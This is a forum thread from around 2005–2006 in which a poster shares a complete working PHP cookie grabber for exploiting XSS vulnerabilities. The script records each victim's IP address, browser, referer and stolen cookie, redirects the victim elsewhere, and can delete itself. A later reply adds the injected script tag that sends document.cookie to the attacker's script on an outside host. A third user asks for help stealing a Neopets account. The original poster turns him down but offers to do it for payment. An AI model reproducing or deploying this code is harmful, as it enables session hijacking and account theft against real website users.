#18904 - 09/23/05 07:23 AM
Cookie Grabber
|
Joined: Jun 2003
Posts: 807
Ghost
UGN Super Poster
|
UGN Super Poster
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
|
I just realized that I never posted this. This is a cookie grabber for use with XSS vulnerabilities coded in PHP by me. It's simple yet powerful by allowing you to view the cookies through an XHTML interface. There are even login features if you choose to enable them. <?php
//Ghost's Cookie grabber v2.0
/* Begin Config Section */
//Password to access stolen cookies
$ConfigPassword = 'example123';
//File to write, chmodded 666
$CookieFile = "example.txt";
//Cookie name, use a-z A-Z 0-9 _
$ConfigCookie = 'make_this_a_complicated_string_a';
//Flag to identify you as wanting to retrieve cookies
$GetCookiesStr = "getcookies";
//Usage: http://www.sitename.tld/path/script.php?getcookies
//Flag to identify you as wanting to delete script and data file
$DeleteStr = "delete";
//Usage: http://www.sitename.tld/path/script.php?delete
//Name of variable you want to recover and store the stolen cookie
$StolenCookieStr = "str";
//Usage: http://www.sitename.tld/path/script.php?str=
//Place to send browser once cookie has been obtained
$Redirect = "http://www.google.com";
/* End Config Section */
$Self = $_SERVER['PHP_SELF'];
$GetCookies = $_GET["$GetCookiesStr"];
$Delete = $_GET["$DeleteStr"];
$StolenCookie = $_GET["$StolenCookieStr"];
/* Un-comment functions below for login features */
/*
//Remove the Symbols above (slash and asterisk) to enable login features.
//Remember to scroll down and remove the other part of the comment as well.
function LoggedIn()
{
global $ConfigCookie;
$Cookie = $_COOKIE["$ConfigCookie"];
if(isset($Cookie)) {
return true;
} else {
return false;
}
}
function LogIn()
{
global $ConfigCookie;
setcookie("$ConfigCookie");
DisplayCookies();
}
function Authenticate()
{
$Pass = $_POST['pass'];
global $ConfigPassword;
global $Self;
if($Pass == $ConfigPassword) {
LogIn();
} else {
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
<form action="<?php $Self; ?>" method="post">
<table border="1" cellspacing="1" cellpadding="1" rules="rows" align="center" width="50%">
<tr><th>Password</th><td align="center"><input type="password" name="pass" size="25"/></td></tr>
<tr><td align="center" colspan="2"><input type="submit" value="Login" /></td></tr>
</table>
</form>
</body>
</html>
<?php
}
}
//Remove The symbols below (slash and asterisk) to enable login features
*/
function DisplayCookies()
{
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cookie Details</title>
<meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
<table border="1" cellspacing="1" cellpadding="1" rules="all" align="center" width="75%">
<tr><th colspan="6">Cookie Details</th></tr>
<tr><th><small>IP Address</small></th><th><small>User Agent</small></th>
<th><small>Referer</small></th><th><small>Cookie Values</small></th></tr>
<?php
global $DeleteStr;
global $CookieFile;
$handle = fopen("$CookieFile", "a+");
$CookieFileContent = fread($handle, filesize("$CookieFile"));
$i = 0;
$CookieFileExploded = explode("\n", $CookieFileContent);
$NumCFE = count($CookieFileExploded) - 1;
while($i < $NumCFE) {
$j = $i + 1;
$k = $j + 1;
$l = $k + 1;
echo '<tr><td align="center"><small>' . "$CookieFileExploded[$i]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$j]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$k]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$l]"
. '</small></td></tr>' . "\n";
$i = $i + 4;
}
?>
</table>
<center><b><a href="<?php echo $Self; ?>?<?php echo $DeleteStr; ?>"><pre><font color="#000">Delete Script and Datafile</font></pre></a></b></center>
</body>
</html>
<?php
}
function SelfDestruct()
{
global $CookieFile;
$FSSelf = __FILE__;
if(file_exists($CookieFile)) {
unlink($CookieFile);
}
unlink($FSSelf);
}
function WriteCookies()
{
global $CookieFile;
global $StolenCookie;
global $Redirect;
global $Path;
$IP = $_SERVER['REMOTE_ADDR'];
$Browser = $_SERVER['HTTP_USER_AGENT'];
$Referer = $_SERVER['HTTP_REFERER'];
if($Browser == NULL) {
$Browser = "NULL";
}
if($Referer == NULL) {
$Referer = "NULL";
}
if($StolenCookie == NULL) {
$StolenCookie = "NULL";
}
$handle = fopen("$CookieFile", "a+");
$Content = "$IP" . "\n" . "$Browser" . "\n" . "$Referer" . "\n" . "$StolenCookie" . "\n";
if(is_writeable("$CookieFile")) {
$Write = fwrite($handle, "$Content");
}
header("Location: $Redirect");
fclose($handle);
}
if(function_exists('LoggedIn') && LoggedIn()) {
if(isset($Delete)) {
SelfDestruct();
die();
}
DisplayCookies();
} elseif(isset($GetCookies)) {
if(function_exists('Authenticate')) {
Authenticate();
} else {
DisplayCookies();
}
} elseif(isset($Delete)) {
SelfDestruct();
die();
} else {
WriteCookies();
}
?>(Feature added)
|
|
Liked:
JAISP |
|
|
|
#18911 - 01/16/06 11:35 PM
Re: Cookie Grabber
|
Joined: Jun 2003
Posts: 807
Ghost
UGN Super Poster
|
UGN Super Poster
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
|
|
|
|
|
#18917 - 01/20/06 12:56 AM
Re: Cookie Grabber
|
Joined: Jun 2003
Posts: 807
Ghost
UGN Super Poster
|
UGN Super Poster
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
|
..and it stole their neopets password? Originally posted by Neokd101:
have you heard of neopets?? Well if i wanted to cookie grab someones password and username and have it sent to a email address. what would the script look like. so if i put it on a webpage and they visited the webpage it took their username and password and sent it to my emai haha....
|
|
|
|
#18918 - 01/20/06 04:15 PM
Re: Cookie Grabber
|
Joined: Jan 2006
Posts: 4
Neokd101
Junior Member
|
Junior Member
Joined: Jan 2006
Posts: 4
Idaho
|
|
|
|
|
#18921 - 01/21/06 04:51 AM
Re: Cookie Grabber
|
Joined: Jun 2003
Posts: 807
Ghost
UGN Super Poster
|
UGN Super Poster
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
|
There is absolutely no way I would do this for you, other than you paying me for the services. The fact is, I wrote that script for my personal use. I released it publicly because I believed that some people may find a use for the code, and be able to include or adapt it for their own releases. I don't intend to write code updates for somebody who wants to use it for a really lame purpose that I honestly don't care about. As Gizmo has put it "We're not here to hold your hand while you piss."
So, to help you out here, I will NOT be writing code for you, and if I were you, I would think it unwise to keep persiting along this line of questioning.
Don't expect to come into a community like this, ask a question, and expect everyone to drop everything they're doing just to help you with your stupid little want to gain access to some lame account on some lame website. Those of us here who know how to write code have taken time and energy to do it, and having someone who has absolutely no knowledge on the subject, or a wish to learn on the subject, is insulting to all of us who do care about what we're learning and want to learn more.
|
|
|
|
#41165 - 11/02/06 02:15 AM
Re: Cookie Grabber
[Re: Neokd101]
|
Joined: Nov 2006
Posts: 1
KurtK
UGN Newbie
|
UGN Newbie
Joined: Nov 2006
Posts: 1
|
For those of you having trouble getting this to work, here's a hint: <SCRIPT>location.href = "http://www.examplesite.com/script.php?str="+document.cookie</SCRIPT> Thanks tons for this, Ghost  Sorry for the necro-bump, but I stumbled on this thread through google and it really helped me out.
Last edited by KurtK; 11/02/06 02:17 AM.
|
|
|
|
|
Forums45
Topics34,109
Posts69,256
Members2,167
Average Daily Posts3
| |
Members2,167
Most Online1,567
Apr 25th, 2010
|
|
|
